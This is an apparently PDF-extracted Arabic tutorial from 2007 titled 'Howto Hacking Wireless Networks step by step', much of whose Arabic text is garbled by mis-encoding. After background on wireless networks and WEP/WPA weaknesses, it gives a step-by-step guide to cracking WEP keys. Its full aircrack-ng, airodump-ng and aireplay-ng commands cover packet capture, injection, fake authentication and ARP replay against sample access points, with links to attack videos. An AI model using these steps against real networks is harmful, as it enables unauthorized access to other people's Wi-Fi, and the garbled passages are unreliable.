ا رق ا و
http://www.t0010.com
א א א
א
BrokeN-ProXy ####################### Br0ken r0x###################### # Lesson : Howto Hacking Wireless Networks step by step # # Author: BrokeN-ProXy # # Page: www.3asfh.net & www.sniper-sa.com # # Contact Me 0nly email:
[email protected] # # Msn Messenger :
[email protected] # ####################### r0x just do it ############### #####
Hacking Wireless Networks
© Copyright #₪₩~ BrokeN-ProXy #₪₩~ 2007 2
ا رق ا و
http://www.t0010.com
W9:;<)א:+<=אא
%&*)('א
http://www.3asfh.net/vb/
+&א,%**)('א
http://www.sniper-sa.com/forums/
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
+=אא/8?א*@א
!"#$א א T0010.COM
##-א./א0*123(45## http://www.t0010.com/books/index.php
8!"#$א+א67 --------------------------------------------------------------
aLT3rEQ$Hacker ---------------------------------------------------------------
: ',-+ '()*+ قIـK 0ـ,K L+0ـMNار ا6FG اAdobe Reader /+0123 ام6789 ا:;<= >?@ ار6ـF إ2ـT] O;ـ,P8Nب و0ـ8SN اOTا63 دةIWI,N اX3وا2N ا:Y+ O,YZ [SN : [N08N اX3ا2N اa<= 'آ2dN اefI+ aN اذه> إ/+012^N ه_ا اL+ http://www.adobe.com/uk/products/acrobat/readstep2.html 3
ا رق ا و
http://www.t0010.com
W+ ('א ٥KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK WARNING(=A ٦KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKEF'אDא1) EWLANFEF'אD א J(-אK(& EFאN7$ @'אL!אM ١٣KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKEF'אDאOD Wired Equivalent PrivacyN5 Wi-Fi Protected AccessN5 ١٥KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKJ(אאא#Z[אV)Y*EX"א'אRS"אTUVWSא 6V\F ١٧KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK aircrack-ng]! 5 ١٨KKKKKKKKKKKKKKKKKKK_אOa5V*)!`E"_)אWwireless tools 5 ١٩KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKcX'אDא45d3e ٢٠KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK[ Monitor Mode]R-א9:'א4(A ٢٢KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKThe attack method 19"Sאij/(אk ٢٦KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKThe attack method 2!aאij/(אk ٣٢KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKlmא
4
ا رق ا و
http://www.t0010.com
WARNINGKKKKK(=A
KK0*1o*אאpS"א+<=אאi)אYE;אE אMX"n8Zא,6-א8!אZ: Dq0q6&()W("T)t"OY06&()W(()"uvFEHackingqאrMsp"MrM)(M" q (uSq /}אqqM$qq!MFFqq{qq (|=qqאN"SאLqq*אqqrqq!rMzqq*lM،(Zwqq xuSאq :" q&אDq![_q"'=אq)|אqA"q*Sא'אq~aאRq:"q6\!Sאqq(א/}<=אM!MKK,6-א EE,6-א+@, e&-"א W+<=אאr"0!&[(4_@)אr {אe)& +<=אאWZM)" KWirelessqאEF'אDאא#Z$_&WW_$"M
K8 אp"אS ,6V-'"אDא8E)אW_ !
EF'אD)אmTR"U-'א5D"א،!['אF+3%Mא6&W_a
K43*<)W($"Vא#Z
א6אV@rM '5Dqאq5rwא.5q/אq<JqM4~Dqאq6\!M[T)qWא-~א'אa"אK&! *א K*SאV6\!"V@K&p!KDV r*&('&-[*א zq*lMq5"qY-א4~Dqאq\!q "]אqאq 5 [O54e0.5/א17Z Vqq @"V&אqq qq (6Vqq !M(qq Tqq ~-אv""|)qq 3 א3qq (rM,6qq -א+qq @q q K &"אFEאN")א*"א [אj1 eR[6<-"א
5
ا رق ا و
http://www.t0010.com
EF'אDא1)
WEWLANFEF'אDא q6אFqq<"q&א5qS zq")((r|M[4*אdYDאr rwא
s%M
0qq (qq !#!$[אs7qq "א8qq !"#)אqq (אzqq ("M4qq E(rM qq (4qq א5|Mr")qq "Nqq 6א qq'אqq1'FqqאNFqqZ0qq!-אrאOqqk5qq@'אtqqkqqzqq1(eqq-אrqq sqq%M"qq5 K!#!$ N7FN6אi)אYEא8kSא WLAN \wireless local FqEFאq'אq qDqא8q<"T)()א*א4 =אq q<4q q5" radio Fq q(RאאTqq @:qq 1qq !#!$אDqq N7qq $ qq *=אqq <s6qq "Earea network KFESא1N7$א$) Efrequency/RF 8qEF*א אi)אYEאVedYD( אXא5Sא1T18Ve*Zא*אM ٢٠٠٥iqq1Nqqqq&;אqqM qq[`$w'אqq9:*Zqqאqq*אR)qq14q %")qq"Kqq!#!$ WN7F,t(7*1z1*Z)*א*א6&"
6
ا رق ا و
http://www.t0010.com
Ewireless computer cardsFEFא6 'אJ١ q =אq<|qA"0 ep r)"MZ.VW|M"MN6א.V TRWr)" K8WZ"M8ZאR8t<אz1
W8EF"'א5L!אM 01!6אTUVW8E$'5 PCMCIA
-אTUVW8E$'5
USB01!6"א-אTUVW8E$'5
.V)] א8E$'5V )W(*(#*EeN6אTUVWM8qeW\F 7
ا رق ا و
http://www.t0010.com
WEaccess pointFN% ! אJ٢ *ZqE!z1|AXא'אt * MK!#!$אD EF'אאDא47 Dq 07qq%Z1*q%q6 Tt אZ8t<א1N%! אD4e . 0pMNE 'א1
+<=אא8qeV( 5(kvD i!`E"
8
ا رق ا و
http://www.t0010.com
J(-אK(& rqqe،q /Dqq!$ אqqE"אqqאqq1R"،q Veאqq)qq5"א،qqEF' אqq*אKqqqqY W4a'En Institute of Electrical and Electronics Engineers (IEEE) Internet Engineering Task Force (IETF) Wireless Ethernet Compatibility Alliance (WECA) International Telecommunication Union (ITU) 4q!q5Kq(& IEEE 4q6&'אq16iqF _ a،J(- )אtRVWT)& #D Kq5"Eq SאqA;q"אMq((R'אqWi)אYqEא;אqE،،F _ aqFqZ9:.qVW q'&-א K'$7FNEאE"i)אYEאz" q *אq1"،q אTאRq qV IEEE 4a'Enre ،EF'אDאJ(( ;*M . EFאN7$'אDT)(exZM ("،rS"א،|RR#א
9
ا رق ا و
http://www.t0010.com
EFאN7$ @'אL!אM Xq'אeq-א9:_אR*qEאq¡Lאq!M6qpqEF' אDqאK*7q ،'אDא4a .EF'אDאL!אML!451 T=* *E"<1 '!אNE:E W (WWAN) *&אE"אEFאN7$@'אK١ "MT)q&אq&'אDq אq1qE$'$7qאJqEq,)Yq- אWWAN 'q*q¢l K%m'אDא qא-אi)אYEאNFZN")"אr)-א4a،&E"אe~אW {k*1'$7$<=אi)אYEא " KEF)אm|אe4Te-א1*7א6Sא6\!M "M'tא/אTR)& Global 8!qaא4qאq6\!M6qE2GF8!aא4א6\! אWWAN '*`&£ Cellular Digital Packet "،System for Mobile Communications (GSM) Code Division Multiple Access (CDMA). "،Data (CDPD) TR")qN¤qoq!:Vq& cq Xq"א،8!qaא4 אN7@'אN!FRVאe 9:ep _61_E EXא2aא4*'א9:،V& , {eאאi)19:ep . 2aא4j861}( D* ITU ¤jDK&אNN¤j!א: Oe
W Wireless metropolitan area networks ( WMAN ) K٢ q *6qpTR)q& qא,q qE$'$7qאJqEq,)Yq- אWMAN 'q*q¢l r")q E -א4ai1r["M8&Wi6p "M*&*()[¥rT)1, _FaF!) K mאOW"E3*'אF"אMt` אS'אF5)-&אא [cqu"،qאN7q$'אDq1)q54q6& rM WMAN 'Dqq ،cqu9:eqp K אN7$אDTWn- אmא4 &
10
ا رق ا و
http://www.t0010.com
zq1q אRאRUq("'q! א4q*;אq6אqA&@S"אM((RאאאS אWMAN '@i)Y K1'1 !#!:9:N%א,)Y6 eX(א* "א1EFאN7$@'א multichannel multipoint distribution service 4qa،q¡'q*i)אYqEאq 4q61q166، local multipoint distribution services (LMDS)"(MMDS) =q<(q )q'q%א-(אq [q *(אq18qEF אNq%אJ(q-IEEE 802.16 . '*א
W (WLAN)אEFאN7$@'אK٣ 4qEzq1Fqq * 6qpqE$'$7qאJqEq,)Yq- אWLAN 'q*ql KE 4ai1r["M،5@"Mz*6p،Na-א q5q5rq2qxqZM5qM["Mqn-אq- [אWLAN 'q@i)אYqE אq [4q6& אqr)Yq-א6q(zqTRqW LAN q@9:eqp "M،_ q!TOq5'F qא K¡'"M[";*א6p¡ א 4q6&'אq 47qqEES אWLAN 'q@[K,(q 4q6&rM WLAN 'Dqq 8qEFאNq%אq! qEqWZiRqTUqVWM"Mq((RאN7qאq@ ' TUVWMFEFא 9:Oq\!Lq!q WLAN 'q@[KDqEES"א*א46& 'א, j546&Xא KO\! r"R qqnN7qqאqq@אDqq(rM،'אlnqqqq14qqa،TR")qqqq *[,)YqqT)qq&qq .DאRא9:N%¥LאR*<(אu:،N%"!i)אYEא 'q!א4q!1qER)q§|="א،WLAN 'D٨٠٢{١١}z1 IEEE R%، 1997i1[ q(، q-) אq()}אq-א0q!5"")q(|=qא٨٠٢{١١b}q6_qe"Kq!a ~٢9: ١ KU<~W ٢{٤RR#אz1!a ~١١<)x71 '!א4! zq1q!a q q~ ٥٤<)qx7q1 '!א4!R)§|=א،٨٠٢{١١a<Z)()W} .U<~W٥RR#א
11
ا رق ا و
http://www.t0010.com
WWireless personal area networks ( WPAN ) K٤ ، PDA4qqaFTUqqVWqqe5qqE$'$7qqאJqqE qq,)Yqq- אWPAN 'qq*qql ;q( אPOS) 87qYDא46&;אe6pT)Wא-אE6א6 אTUVWM"M،(mאKא/א KM١٠ezi)Y- §|=<א; אPOS 8q< Bluetooth q*K;אq6אqA&@S "אBluetooth 8<EES אWPAN '* _ K_ )٣٠z'e9:'!א4*((RאאאS אi)Y4() * q Bluetooth q*(q q("qt"א+q"אr)אqאq1 Bluetooth 'q! 4! Xqא، Bluetooth Special Interest Group (SIG)z6qq*=אqV q6V q164q _)אW O~% !6pTUVWSא4%،4() 4D K١٩٩٩i1١{٠)א% אBluetooth '%' אD! . ;א6אA&@S 'k;אD!:,)Y6 ،E4M"M#١F iq
WPAN 'Dq٨٠٢{١٥4q6&אq16 IEEE qEM، WPAN'q*(q )q
1.0. )אq% אBluetooth 'q%א9:_אR*qEא، WPANJ(q(q =q<4q6&אq16 4~Dqqאqq!: ،qq אFVqqEאqq©،)qq&אqq©8qq<J(qq-=אqq/qqt)א`אqq
W)7-א W8אא אz1~p()אU6TeT_TaTW("R<+1 http://www.arabhardware.net/forum/showthread.php?t=27438&highlight=WLAN
qpMLqp- אqKqpM"3pא7 &אWRM"Lp-אz1)1 K0W`E|=אe
12
ا رق ا و
http://www.t0010.com
EF'אDאOqD WEP , WPA q6<"EF'אDאOD)Y-'א$5א,1!_()W( KK47 6V*1!`E"
WWired Equivalent PrivacyN5 J١ c=qq،qq*SאkqqY-אqqVW[אqqEF'אDqq@אDqq<IEEE)qqV&[raqqאRM q'אDqqe-א%7qmאqEא0q1qkMq( Nq5" 67 /<=א KWEP+$`1|="אEWired Equivalent PrivacyF {qq A"'qq &-אODqq RC4z1)qq ODqq qq .אZzqq 10qq * [WEPNqq 5" )qq 61א qq5.5Vqqqq TOqq ZTqq~0qqeKDqq5אzqqF(qqkNqq5"=אאqq<i)qq(،%7qqmא K (E4D T~aאv@`אE" bit ١٢٨"M 64 bit )Y-אODאT1\* ~א0( 8q<"RC4L!bit٢٤ODT<IVqאIV[Initialization Vector ][RWT~aא q(q&(IVqqe5q65 q6oqR=אא/"OR 128٦٤)YEא;אE K8r9:IVKM٥٠٠, qqE5qq<"$:{tqqR١٠=qqZ(q אqqאrMqqW)qq אqq ٢٤cqq!rM qq!cqqu)qq& rDqq1bit٦٤"bit١٢٨q qא0qq5vqq@`אqqEqq5M4Dqq T7qqאsqqrM4qqWMqq"
13
ا رق ا و
http://www.t0010.com
WWi-Fi Protected AccessN5 J٢ WEPq !58*אSאD-א4٢٠٠٣i1N5<=אאV "q(63,qE"q( =אq<1)q"Wi-Fi Protected Accessq 7qZא8q<WPA W 6< WPA with RADIUS *q"eOqEJ()q({אq(kq1,)Yq-{ <('א3[אR61$אr(( [<=א K4(kv@9:§0!Sm<=א א1sp"אvDאR)7 WPA with PSK [pre shared key] "M`q٦٣9:٨qqVeMR)q10q65|M`q&!rM !"$6&Eאa5Sא8<( "<=א K Hexadecimal٦٤ =qq <z6qq "qq Vא#Z&א7qq אqq sqq %M2qq _)אqq &qq a5M'qq .אZN6&qq E)אqq " 4Dq Xq"אTemporal Key Integrity Protocolqq7qZא8q<" TKIP q.אmא Ki)Yqq-א4qqqqRqqEאi)אYqqE אq E אi)Yqq4qqODqqאsqqOqq~qq(6qq K0( 54Vא8 "i)Y4 <"IV(k"WEP4a ARP 4q61 q*- qp"|=q"אMessage Integrity Code4qaxqZM'*qA9:ep =אq<"WEPNאi)YqqE$q@RqW"0q[0q rq 8q"אReplay Attack _ q(Mcq!M9:eqp LEM4D D (אc8 "IV 061L(ij/א R)qq& אqq6o)qqqq&(4~Dqq()qqMqqVeqqDqqאr:qq[iqqj/=אאq<i)YqqrM qq cqeא0qerq(i.$IV q6o)q(q*5אu:i.$0q!S4~Dq"Dqאcq"IV+ -א KEFאD*( J5S"א.Vא, 8D )1 V( 5r &!<+؟؟"אאV( 5r 4<,אWPAq W!V-א Dq (RqW-א47qq&(Deauthentication Attackz6q(iqj<i)אYqE אqE א qqEFאDqi)Yqq-אNqZRqq61q)qqrDq1qq!TqrDqq(Vq©"qEFא 5qq/)<אqq& qq*( Jqq5S"אi)Yq-א,qq ODqqאsqqNRqqqqVeqq(Xqאqq\3א8qq<" q6N"q§q&(brute force attack0q?אiqj<i)אYqE אqE אODqאcq(N"q§ q&()Yq-אRqEאTz1)6&(ij/<v®"DאOD)Y-אREא KVz1V(0!אO5N6!'אZ٨RE אu: 14
ا رق ا و
http://www.t0010.com
J(אאא#Z[אV)Y!`EX"א'אRS"אTUVWSא KJ*i\!015N665.VW K١ Aircrack Tools {eא8E$'5 K٢ Aircrack-ng Tools K٣
aircrack-ng tools
{e א8E$'5 aircrack tools
5N6.VW J*i\!01 6V\F
ctאq@)q*1=qq5c=qAircrack ]q! zq146&qEJ('"א545Je0!א KJ*1)(cu9:ep:]!א1)(0!M;@א4)5rM"' '5Dqqאqq¯אK NETGEAR Or Linksys xqqE5DqאqqEאqqVq{qqeאq* 4qq<R)qqA`qqEXqqא8qq<rS_)אqqWqq6V§DqqאLqq!qq&![Chipset]§DqqאLqq!qq6
ا رق ا و
http://www.t0010.com
qqאLqq!46Dq("[]qq! אqqquZqN")qq]]אq! אqqqeא-"'אqqא,q(N")qqW=אq< KJ*aireplay _(M"J*".")*(airodump1R"chipset Chipset
Atheros
Supported by airodump for Windows CardBus: YES PCI: NO (see CommView)
Supported by airodump for Linux
Supported by aireplay for Linux
YES
YES (driver patching required)
Atmel
UNTESTED
802.11b YES 802.11g UNTESTED
UNTESTED
Broadcom
Old models only (BRCM driver)
YES
IN PROGRESS (Forum thread)
Centrino b
NO
PARTIAL (ipw2100 driver doesn’t discard corrupted packets)
NO
Centrino b/g
NO
YES
Centrino a/b/g
NO
YES
Cisco Aironet
YES?
YES
Hermes I
YES
YES
NdisWrapper
N/A
Never
Prism2/3
NO
YES
PrismGT
YES
FullMAC: YES SoftMAC: NOT YET
Ralink
NO
YES (rt2500 / rt2570 / rt61 / rt73 driver)
RTL8180
YES
YES
RTL8187L
UNTESTED
YES (driver patching required to view power levels)
TI (ACX100/ACX111)
NO
YES
ZyDAS 1201
NO
YES
ZyDAS 1211[B] Others (Marvel...)
NO NO
YES UNKNOWN
16
NO (firmware drops most packets) ipw2200inject NO (See this thread for alpha injection support.) NO (firmware issue) NO (firmware corrupts the MAC header) Never YES (PCI and CardBus only, driver patching required) YES (driver patching recommended) YES, see rt2500, rt2570, rt61 and rt73. Also see Ralink chipset comments later on this pager for important concerns UNSTABLE (driver patching required) YES (driver patching recommended for injection and required to view power levels) YES (driver patching required) Partially (See patch for details) YES NO
ا رق ا و
http://www.t0010.com
Aircrack]! 5 La 'א kernel headers gcc 8q"אqV5(q 0&(. ±mאiU")(אV58(&א.אz1dY@45_ &k Debianzq1q*q&(.|M,5q W8אS"א"(אS אEs([Ubuntu , Xubuntu , Knoppix ] sudo apt-get install build-essential
W8א אKK]!א5#8!rwא wget http://download.aircrack-ng.org/aircrack-ng-0.9.1.tar.gz tar -zxvf aircrack-ng-0.9.1.tar.gz cd aircrack-ng-0.9.1 make make install
)7-אa(אkKKJ*,)Y)*1e"&8<")_אWVE]!אa(k K_(J*] אe5 )Y"
17
ا رق ا و
http://www.t0010.com
_אOa5V*)!`E"_)אWwireless tools 5 wgetS Uא3! wget http://pcmciacs.sourceforge.net/ftp/contrib/wireless_tools.28.tar.gz tarS 0 ~pc! tar xvfz wireless_tools.28.tar.gz cd S )z14Z)!~אce)& cd wireless_tools.28 makeS! {א make
make install S ]!א7* i!
make install q V*TOaqq5qq"אM{qq TאRS=אqq<qq1 qqcqq!M2qqJ(אqqאUqqqq5# qq*6=אqq<" KEV@R)7 *FOa"אiwlist "iwconfig
18
ا رق ا و
http://www.t0010.com
cX'אDא45d3e scan all network around 4q4qvq@|=qאwireless tools qאq5rMqFiwlist qSאi)Yq!`qE ESאi)אYE א bt ~ # iwlist ath0 scan ath0 Scan completed : Cell 01 - Address: 00:14:7F:1F:27:6D ESSID:"SpeedTouch433793" Mode:Master Frequency:2.462 GHz (Channel 11) Quality=60/94 Signal level=-35 dBm Noise level=-95 dBm Encryption key:on Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s 24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9 Mb/s 12 Mb/s; 48 Mb/s Extra:bcn_int=100 Extra:wme_ie=dd180050f2020101880003a4000027a4000042435e0062322 f00 Cell 02 - Address: 00:18:39:24:5C:F8 ESSID:"linksys" Mode:Master Frequency:2.427 GHz (Channel 4) Quality=50/94 Signal level=-45 dBm Noise level=-95 dBm Encryption key:off Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s 48 Mb/s; 54 Mb/s Extra:bcn_int=100 Extra:wme_ie=dd180050f2020101030003a4000027a4000042435e0062322 f00
'R)"6O!a"א6T)"א,@23אj! kz1S[אsp<"א65 KrאS 6V-&'א-א
19
ا رق ا و
http://www.t0010.com
[ Monitor Mode ]R-א9:'א4(A N;`EMonitorR-א9:c54(Ac1AircrackUi)אYEא);[א4 K,5" (א؟u،Monitor mode zq1'qאrq(i.$ sniffing |q"'qj5אq)qrD1+"אא *( J5S N7$ ±ZR-<=אאManagedR-אz1r(vא.Vא'[אcDN"M WMonitor Modeq'54(3,(k)W( Kcommand line{(k1W9"Sא (א AircrackU 8airmon-ng z6U{(k1W!aא (א K_ E!5u4aManaged R-אz1r(vא'אcDN"M bt ~ # iwconfig ath0 ath0 IEEE 802.11b ESSID:"" Nickname:"" Mode:Managed Channel:0 Access Point: Not-Associated Bit Rate:0 kb/s Tx-Power:31 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-98 dBm Noise level=-98 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Monitor Modeq'א4(3,( אvD iM`Erwא W9"Sא (א ،،،8& &אcommand line {(k1 bt ~ # ifconfig ath0 down bt ~ # wlanconfig ath0 destroy bt ~ # wlanconfig ath0 create wlandev wifi0 wlanmode monitor ath0 bt ~ # ifconfig ath0 up bt ~ # iwconfig ath0 ath0 IEEE 802.11b ESSID:"" Nickname:"" Mode:Monitor Frequency:2.412 GHz Access Point: 00:0F:B5:EA:2F:AF 20
ا رق ا و
http://www.t0010.com
Bit Rate:0 kb/s Tx-Power:31 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-98 dBm Noise level=-98 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 W!aא (א ،،8& &אAircrackU 8airmon-ng z6U{(k1 bt ~ # airmon-ng stop ath0 Interface Chipset Driver wifi0 eth0 ath0
Atheros madwifi-ng Centrino b/g ipw2200 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
bt ~ # airmon-ng start wifi0 Interface
Chipset
Driver
wifi0 Atheros madwifi-ng eth0 Centrino b/g ipw2200 ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled) bt ~ # iwconfig ath0 ath0 IEEE 802.11g ESSID:"" Nickname:"" Mode:Monitor Frequency:2.457 GHz Access Point: Not-Associated Bit Rate:0 kb/s Tx-Power:31 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-94 dBm Noise level=-94 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0
WWWWij/אk א5 z1M)*ErwאWWWW 21
ا رق ا و
http://www.t0010.com
The attack method 19"Sאij/(אk _(M"MonitorR-אz1'אr(rMij/(אk[M)rM4 KVא#Z()אXאJ(@אאR)rrM *( J5Sאz1c @*(F50er()*1ij/<=אאi)Y! Kinteractive ij/<=אאz6(" W8אu6*אNFZij/<=אא4@"Tesp 6
0qqe"qq*( Jqq5Sאzqq1c qq@+qq+$.qqVW)qqW(KKFqq1M83qqpא4Dqq*[אqq@qq4qqa arp 'qqk4qqE!vא،#qqY-א.qqVWqqZwא+qq F"א،4qq"MOaqq5xqqEqq*6V(qqqqcqqeא qq )qq qq 5M qq 6®"ivs)qq (U!rDqq 147qq -אqq *(F{אqq (kqq 1qq *( Jqq 5Sא9:request ٢٥٠{٠٠٠_q(qqAvא64 bitTqq ODqqאrqq qq& אqqODqqאcqq!)qq!rDqq1qq5א K05 ٥٠٠{٠٠٠_(A128 bitT OD"א،0q5
22
ا رق ا و
http://www.t0010.com
airodump-ng – capture packets aireplay-ng - interactive attack modes [ injection packets] aircrack-ng – crack WEP , WPA
(١) airodump-ng K[V\"5`!אEU({<=|אk1 airodump-ng –c 11 –-bssid 00:14:7F:1F:27:6D –w capture ath0
-c : channel number --bssid : MAC Address for Access Point -w : save the file capture : file name that be save the packet ath0 : our interface name
23
ا رق ا و
http://www.t0010.com
(٢) aireplay-ng Interactive interactivez6(ij<i)Y*E"'!אi!`EU({<=|אq q qk1 aireplay-ng --interactive –b 00:14:7F:1F:27:6D –d FF:FF:FF:FF:FF:FF –m 68 –n 68 –p 0841 –h 00:13:CE:6D:61:59 ath0
--interactive : attack modes -b : MAC Address for Access Point -d : Destination MAC Broadcast -m 68 : minimum Packet length -n 68 : maximum Packet length -p 0841 : Sets the frame control -h : MAC Address for Client ath0 : our interface name
24
ا رق ا و
http://www.t0010.com
(3) increase the packets `qqEE٢FqqTq m{אqq )qq& "_)אqWqqqq!5q5אE١FqqTqq m<)![אq@qq4qa K6R(R.[א5<)אD
(4) aircrack-ng OD אi!`EU({<=|אk1 aircrack-ng –b 00:14:7F:1F:27:6D capture.cap -b : MAC Address for Access Point capture.cap : capture files
25
ا رق ا و
http://www.t0010.com
The attack method 2!aאij/(אk iqqj/=אאqq<z6qq("qq*( Jqq5Sאzqq1c qq@qq*(F5)qqW($)q*1iqqj/=אאqq<i)Yqq! Fake authentication
W8אu6*אNFZij/<=אא4@"Tesp 6
אu:i")q&q&(cqeא#"אq*( Jq5Sאz1c @*(F5|M)W($4D@*[א4a K*( J5Sאz1c @*(F50e qqEK(Uqq z6qq(Fc qq@qq*(F50qqeqq!Mqq*( Jqq5S<אqq!vאiqqj/=אאqq<i)Yqq!4qqא )<DqE"arp replay 4!86<א.Vא1*( J5Sא9:arp request 4E! K8Z4D R(R.[א5א
26
ا رق ا و
http://www.t0010.com
airmon-ng – switch to monitor mode airodump-ng – capture packets aireplay-ng – attack modes fake authentication aireplay-ng – attack modes arpreplay aircrack-ng – crack WEP , WPA
(١) airodump-ng K[V\"5!אvאU({<=|אk1 airodump-ng –c 6 –-bssid 00:14:6C:1A:98:8C –w output ath0
-c : channel number --bssid : MAC Address for Access Point -w : save the file output : file name that be save the packet ath0 : our interface name
27
ا رق ا و
http://www.t0010.com
(٢) aireplay-ng fake authentication K0FZ' א4E!"c @*(F50e!M06<!"*( J5Sא9:'k4E! aireplay-ng --fakeauth 6000 –o 1 –q 10 –e DataCenter –a 00:14:6C:1A:98:8C -h 00-0F-B5-EA-2F-AF ath0
--fakeauth : attack modes -o 1 : Send only one set of packets at time -q 10 : Send keep alive packets every 10 seconds -e : Name of Access Point -a : MAC Address for Access Point -h : our MAC Address Card ath0 : our interface name
28
ا رق ا و
http://www.t0010.com
(3) aireplay-ng arpreplay K*( J5Sא9:* ±m}אRא-א,)Yarp request 4E!`E aireplay-ng --arpreplay –b 00:14:6C:1A:98:8C -h 00-0F-B5-EA-2F-AF ath0
--arpreplay : attack modes -b : MAC Address for Access Point -h : our MAC Address Card ath0 : our interface card
29
ا رق ا و
http://www.t0010.com
(3) increase the packets `qqEE٣FqqTq m{אqq )qq& "_)אqqWqqqq!5qq5אE١FqqTqq m*[אqq@qq4qqa K8ZR(R.[א5<)אD
30
ا رق ا و
http://www.t0010.com
(4) aircrack-ng OD אi!`EU({<=|אk1 aircrack-ng –b 00:14:6C:1A:98:8C output.cap -b : MAC Address for Access Point output.cap : capture files
( 5[)Y-א,( אv@*V!)אr!"<=א XEא ±7m=אאV EM"M'אE|אS"J(@'אא K+אN"M[RW-א8!"#$ ()|א1
31
ا رق ا و
http://www.t0010.com
lmא )qqW(4qq ،qqEF'אDqqאא#qqZ[אqq א8qqV*qq""*qqERqq(V!9:8!אqqZ:*qq%" K&&"<=אא)}(&! [<=אאD"_)אW4(kLp-eTOa5eM"k X(qq {qq 0qqe()qqe,qq)qqW(()qq 4qq54Dqq })qq=אאqq<vDqq qq6)qq W <=א"אz1<)oV@Xאij/א Attack-method 1 ( 124 MB ) http://www.4shared.com/file/24526019/8831b5f1/attackmethod1part1.html?dirPwdVerified=630ebe35 50MB http://www.4shared.com/file/24546586/40c72462/attackmethod1part2.html?dirPwdVerified=630ebe35 50MB http://www.4shared.com/file/24548769/ada0b720/attackmethod1part3.html?dirPwdVerified=630ebe35 24MB Attack-method 2 ( 113 MB ) http://www.4shared.com/file/24553904/65b4efa0/attackmethod2part1.html?dirPwdVerified=24884433 50MB http://www.4shared.com/file/24590482/9b931121/attackmethod2part2.html?dirPwdVerified=24884433 50MB http://www.4shared.com/file/24592271/2b86e86d/attackmethod2part3.html?dirPwdVerified=24884433 13MB `א#qq$_[אFq &eqqאu"א4qq-א0qq!SKK qqtאאJ*qqiqq\*0qqWא8!אqqZ:4qq5qqzqq*lM KJ*qq 0W c1 {qq *-=אאqq<qq"" אDqq($}qq*אDqq($qq"qqE"0qq1 אzqq%(qq*אqqENqq( =אq<`Fq0667qzq1q א8q~א8ZS;1)"אD 9& &)@א0WM8!e(א xqqZM}"R[ ruqq 5אqq!"،vqqj*{"אqqeאi"אR0qqzqq*lM qqtאא4Dqq 0qqWאZ:"+qqא KKKKK " א1iF"א 32
ا رق ا و
http://www.t0010.com
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
)א6+א :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
q<١٤٢٨Lr١٢
( Sptember 23, 2007 )
-------------------------------
8!"#$א+א67 ----------------------------------------------------------------
aLT3rEQ$Hacker ------------------------------------------------------------------
33